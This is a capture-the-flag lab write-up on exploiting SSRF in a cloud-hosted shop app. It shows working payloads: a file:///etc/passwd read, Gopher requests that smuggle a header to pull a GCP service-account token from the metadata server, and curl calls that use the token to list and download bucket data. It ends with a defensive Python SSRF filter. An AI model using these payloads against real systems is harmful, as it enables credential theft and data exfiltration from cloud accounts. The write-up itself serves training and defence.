PwnedLabs - Exploit SSRF with Gopher for GCP Initial Access (Cloud Pentesting)
Source: Dev.to
Lab description

Target IP Address: 35.226.245.121
Enumeration

From the initial port scan, ports 22 (SSH) and 80 (HTTP) are open, while ports 1433, 3389, and 5432 are closed.


After viewing the landing page and moving on to the shop page, inspecting the page elements reveals that the site uses a Google Cloud Storage bucket. On the profile.php page we can test for a Server-Side Request Forgery (SSRF) vulnerability.

Exploitation

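Using the file:///etc/passwd payload we are able to read the local /etc/passwd file, proving that the application is vulnerable to SSRF.
To pivot into the cloud environment we first query the VM metadata server for the associated service account. The metadata server only answers requests that carry the Metadata-Flavor: Google header, so the request is sent as a Gopher payload whose double URL-encoded body contains the full HTTP request, including that header: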
gopher://metadata.google.internal:80/xGET%2520/computeMetadata/v1/instance/service-accounts/%2520HTTP%252f%2531%252e%2531%250AHost:%2520metadata.google.internal%250AAccept:%2520%252a%252f%252a%250aMetadata-Flavor:%2520Google%250d%250a

The response reveals the service account name:
bucketviewer@gr-proj-1.iam.gserviceaccount.com
Next, we retrieve the service account’s access token with another Gopher payload:
gopher://metadata.google.internal:80/xGET%2520/computeMetadata/v1/instance/service-accounts/bucketviewer@gr-proj-1.iam.gserviceaccount.com/token%2520HTTP%252f%2531%252e%2531%250AHost:%2520metadata.google.internal%250AAccept:%2520%252a%252f%252a%250aMetadata-Flavor:%2520Google%250d%250a

Export the token as an environment variable:
export ACCESS_TOKEN=
Data exfiltration
With the credentials we can query the bucket via the Google Storage API:
curl "https://www.googleapis.com/storage/v1/b/gigantic-retail/o" \
-H "Authorization: Bearer $ACCESS_TOKEN"

The response reveals a path to a flag. Finally, download the flag file:
curl -o flag.txt "https://storage.googleapis.com/gigantic-retail/"
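
A defensive counterpart to the payloads above, as an added example that is not part of the original write-up: a Python check for a URL-fetch feature like the one on profile.php that rejects and flags non-HTTP schemes, metadata or link-local targets, and multi-layer percent-encoding. The function names, the decode cap and the abbreviated sample payload are assumptions made for illustration.

```python
import ipaddress
from urllib.parse import unquote, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
METADATA_HOSTS = {"metadata.google.internal", "169.254.169.254"}
MAX_DECODE_ROUNDS = 5  # assumption: cap on nested percent-encoding we unwrap
# Constructed sample: abbreviated form of the double-encoded Gopher payload shape.
GOPHER_SAMPLE = ("gopher://metadata.google.internal:80/xGET%2520/computeMetadata/v1/"
                 "%2520HTTP%252f1.1%250AMetadata-Flavor:%2520Google%250d%250a")

def fully_decode(value):
    """Percent-decode until the value stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < MAX_DECODE_ROUNDS:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def ssrf_findings(user_url):
    """Return the reasons a user-supplied fetch URL should be rejected and logged."""
    try:
        parts = urlsplit(user_url.strip())
    except ValueError:
        return ["unparseable"]
    findings = []
    decoded, rounds = fully_decode(user_url)
    if rounds > 1:  # more than one layer of encoding has no legitimate use here
        findings.append("multi-layer-encoding")
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        findings.append(f"scheme:{parts.scheme.lower() or 'none'}")
    host = (parts.hostname or "").lower().rstrip(".")
    if host in METADATA_HOSTS:
        findings.append("metadata-host")
    else:
        try:
            if ipaddress.ip_address(host).is_link_local:
                findings.append("link-local-address")
        except ValueError:
            pass  # not an IP literal; DNS-based checks are out of scope here
    if "metadata-flavor" in decoded.lower():
        findings.append("smuggled-metadata-header")
    return findings

if __name__ == "__main__":
    for url in ("file:///etc/passwd", GOPHER_SAMPLE, "https://example.com/avatar.png"):
        print(url[:60], ssrf_findings(url))
```

A string check like this does not catch a hostname that resolves to a link-local address, so the resolved IP should also be validated when the connection is made.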
